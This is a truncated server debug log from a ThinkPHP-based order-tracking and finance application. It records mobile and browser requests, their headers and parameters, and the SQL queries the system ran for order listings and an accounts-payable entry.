'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:12+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=2&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=2&pageNum=10 [运行时间:0.056540s][吞吐率:17.69req/s] [内存消耗:4,769.92kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001231s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '2', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001679s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000591s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001509s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000507s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001855s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001174s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308331>orderinfo.end_time desc,1658308331>orderinfo.end_time desc,1658308331-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 20,10 [ RunTime:0.003124s ] --------------------------------------------------------------- [ 2022-07-20T17:12:12+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020814s][吞吐率:48.04req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001198s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:12+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021355s][吞吐率:46.83req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001224s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:12+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020508s][吞吐率:48.76req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001111s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:13+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020978s][吞吐率:47.67req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000056s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001244s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:15+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021246s][吞吐率:47.07req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001156s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:15+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021356s][吞吐率:46.83req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001157s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:16+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021072s][吞吐率:47.46req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001252s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:16+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018538s][吞吐率:53.94req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001047s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:16+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=3&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=3&pageNum=10 [运行时间:0.048340s][吞吐率:20.69req/s] [内存消耗:4,769.88kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001056s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '3', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001484s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000491s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001362s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000321s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001397s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000940s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308336>orderinfo.end_time desc,1658308336>orderinfo.end_time desc,1658308336-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 30,10 [ RunTime:0.002491s ] --------------------------------------------------------------- [ 2022-07-20T17:12:17+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021406s][吞吐率:46.72req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001141s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:21+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.030129s][吞吐率:33.19req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000052s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001184s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001618s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000097s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:22+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020540s][吞吐率:48.69req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001114s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:22+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.030849s][吞吐率:32.42req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001118s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001547s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000127s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:22+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020273s][吞吐率:49.33req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001144s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:22+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.023074s][吞吐率:43.34req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001307s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:23+08:00 ] 106.112.205.110 POST /admin/financial/accountspayable/add?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1 [运行时间:0.071309s][吞吐率:14.02req/s] [内存消耗:5,473.66kb] [文件加载:87] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001164s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'add', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '208', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'row' => array ( 'subject_type' => '1', 'suppliercustomer_id' => '89', 'worker_id' => '', 'explain' => '运费', 'money' => '134', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001601s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->add[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007933s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000487s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001390s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000597s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001200s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001331s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001602s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000400s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001513s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountspayable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.000674s ] [ sql ] [ SQL ] INSERT INTO `ot_accountspayable` (`subject_type` , `suppliercustomer_id` , `worker_id` , `explain` , `money` , `factorymge_id` , `year` , `month` , `day` , `createtime` , `updatetime` , `yu_money`) VALUES (1 , 89 , 0 , '运费' , 134 , 40 , 2022 , 7 , 20 , 1658308343 , 1658308343 , 780398.81) [ RunTime:0.005623s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001392s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 应付账款 